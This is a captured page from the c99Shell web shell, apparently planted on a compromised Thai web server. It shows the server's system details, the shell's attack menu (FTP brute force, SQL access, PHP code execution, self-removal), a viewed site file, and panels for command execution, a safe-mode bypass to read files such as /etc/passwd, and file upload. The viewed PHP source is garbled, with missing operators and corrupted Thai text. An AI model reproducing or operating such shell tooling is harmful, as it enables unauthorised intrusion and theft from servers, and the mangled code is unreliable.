!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/manage/_manage_depart/   drwxr-xr-x
Free 51 GB of 127.8 GB (39.9%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     AddSource.php (2.98 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

    
include("../include/FunctionDB.php");
    
$msg "&nbsp;";
    
$reload "";
    
    if ( !empty(
$MoneyS_M) )
    {
        
$MoneyS_M ereg_replace ("\"","&quot;" ,"$MoneyS_M");
        
        
ConnectDB();
        
//###  user_tb
        
$checkid 0;
        
$sql11 " Select  *  From  money_source_tb ";
        
$result11 mysql_query($sql11);
        while (
$rs11 mysql_fetch_array($result11)){
                if (
$rs11["MoneyS_M"] == $MoneyS_M){
                        echo 
"<meta http-equiv=\"Content-Type\" content=\"text/html; charset=windows-874\" />";
                        echo 
"<script>alert('ÃËÑÊ¢éÍÁÙž×é¹°Ò¹ÁÕ¡ÒÃãªé§Ò¹ÍÂÙèáÅéÇ');</script>";
                        echo 
"<script>window.opener.document.all.myForm; window.opener.location.reload(); window.close();</script>";
                        exit();
                }else{
                        
$checkid 1;
                }
        }
        if (
$check == 0){
        
        
InsertMoneySource($MoneyS_M);
        }
        
$msg "<font color=\"#FF0000\"><strong> à¾ÔèÁ¢éÍÁÙÅáËÅè§à§Ô¹ '<font color=\#0000FF\"> $MoneyS_M </font>' COMPLETE</Strong></font> ";
        
$reload "<script language=\"JavaScript\">\n";
        
$reload $reload."parent.frames.nav.location.reload();\n";
        
$reload $reload."</script>";
        echo 
"<script>window.opener.document.all.myForm; window.opener.location.reload(); window.close();</script>";
        
//echo "<meta http-equiv=\"refresh\"content=\"2;URL=AddSource.php\">\n"; 
        
CloseDB();
    }
    else {
        
$msg "<font color=\"#FF0000\"><strong>ÂѧäÁèä´é¡ÃÍ¡¢éÍÁÙÅáËÅè§à§Ô¹ </Strong></font> ";
    }
?>
<html>
<head> 
<title><?=$_Config_sitename;?></title>
<meta http-equiv="Content-Type"content="text/html; charset=windows-874" />
<link href="../css/style1.css" rel="stylesheet" type="text/css">
<head>

<body bgcolor="#FFFFFF">
<span style="text-align:center">
<? $reload?>
<b><? $msg?></b>
<br />

  <table width="500" border="0" cellspacing="0" cellpadding="0">
    <tr>
      <td><fieldset><table width="500" border="0" cellspacing="1" cellpadding="0" align="center">
        <form method="post" action="<? echo  $PHP_SELF?>">
          <tr align="center" bgcolor="#F0F0F0"> 
            <td colspan="3" class="Tahoma8"><b><font color="#000000" size="4" face="Tahoma">à¾ÔèÁ¢éÍÁÙÅáËÅè§à§Ô¹</font></b></td>
          </tr>
          <tr> 
            <td width="132" align=right bgcolor="#dddddd"><font size="2" face="Tahoma">ª×èÍáËÅè§à§Ô¹</font></td>
            <td width="23" bgcolor="#dddddd"><font face="Tahoma">&nbsp;</font></td>
            <td width="455" bgcolor="#dddddd"><font face="Tahoma"><input name="MoneyS_M" type="text" id="MoneyS_M" title="Fill Money Source Name" size="50" /></font></td>
          </tr>
          <tr bgcolor="#006699"> 
            <td colspan="3" align="right" bgcolor="#F0F0F0"><div align="center"><font face="Tahoma"><input type="submit" name="Submit" value="  à¾ÔèÁ¢éÍÁÙÅ "></font>
                 &nbsp;
                 <input type="button" name="close" value="»Ô´Ë¹éÒµèÒ§" onClick="window.close()" />
              </div></td>
          </tr>
        </form>
      </table></fieldset></td>
    </tr>
  </table>
 </span>
 </body>
</html>

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0172 ]--